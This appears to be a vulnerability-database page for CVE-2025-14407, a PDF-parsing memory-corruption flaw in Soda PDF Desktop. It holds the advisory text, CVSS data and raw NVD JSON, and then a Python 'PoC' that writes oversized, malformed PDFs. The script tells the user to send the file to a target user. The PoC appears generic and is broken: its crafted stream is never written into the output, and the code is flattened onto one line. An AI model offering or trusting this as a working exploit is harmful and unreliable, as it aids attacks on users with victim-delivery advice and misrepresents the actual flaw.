Security Vulnerability Report
中文
CVE-2025-14407 CVSS 5.5 MEDIUM

CVE-2025-14407

Published: 2025-12-23 22:15:47
Last Modified: 2026-01-21 20:58:27
Source: [email protected]

Description

Soda PDF Desktop PDF File Parsing Memory Corruption Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27141.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:* - VULNERABLE
Soda PDF Desktop < 最新版本
Soda PDF Desktop (具体版本需从官方渠道确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-14407 PoC - Soda PDF Desktop PDF Parsing Memory Corruption # This PoC generates a malicious PDF file that triggers memory corruption from PyPDF2 import PdfWriter from io import BytesIO import struct def create_malicious_pdf(): """Create a malicious PDF that triggers memory corruption in Soda PDF Desktop""" # Create a basic PDF structure pdf_writer = PdfWriter() # Add a page from reportlab.pdfgen import canvas from reportlab.lib.pagesizes import letter packet = BytesIO() can = canvas.Canvas(packet, pagesize=letter) can.drawString(100, 750, "Malicious PDF for CVE-2025-14407") can.save() packet.seek(0) pdf_writer.append(packet) # Inject malformed stream data to trigger memory corruption # This exploits the lack of proper validation in PDF parsing malicious_stream = b"" # Add oversized stream length to trigger buffer overflow malicious_stream += b"x" * 65536 # Large payload # Add malformed object references malicious_stream += b"<< /Length 999999 /Filter /FlateDecode >>" # Write to file output = BytesIO() pdf_writer.write(output) with open('CVE-2025-14407_poc.pdf', 'wb') as f: f.write(output.getvalue()) print("[+] PoC PDF created: CVE-2025-14407_poc.pdf") print("[+] Send this file to target user to open with Soda PDF Desktop") if __name__ == "__main__": create_malicious_pdf() # Alternative: Simple malformed PDF trigger def create_simple_poc(): """Minimal PoC - Malformed PDF that triggers parsing vulnerability""" poc_pdf = b"""%PDF-1.4 1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj 2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj 3 0 obj<</Type/Page/Parent 2 0 R/Resources<</Font<</F1<</Type/Font/Subtype/Type1/BaseFont/Helvetica>>>>>>/MediaBox[0 0 612 792]/Contents 4 0 R>>endobj 4 0 obj<</Length 1000000 >>stream """ + b"A" * 1000000 + b""" endstream endobj xref 0 5 0000000000 65535 f 0000000009 00000 n 0000000058 00000 n 0000000115 00000 n 0000000214 00000 n trailer<</Size 5/Root 1 0 R>> startxref 1000000 %%EOF""" with open('CVE-2025-14407_simple_poc.pdf', 'wb') as f: f.write(poc_pdf) print("[+] Simple PoC created: CVE-2025-14407_simple_poc.pdf") create_simple_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14407", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.330", "lastModified": "2026-01-21T20:58:26.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop PDF File Parsing Memory Corruption Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27141."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1080/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.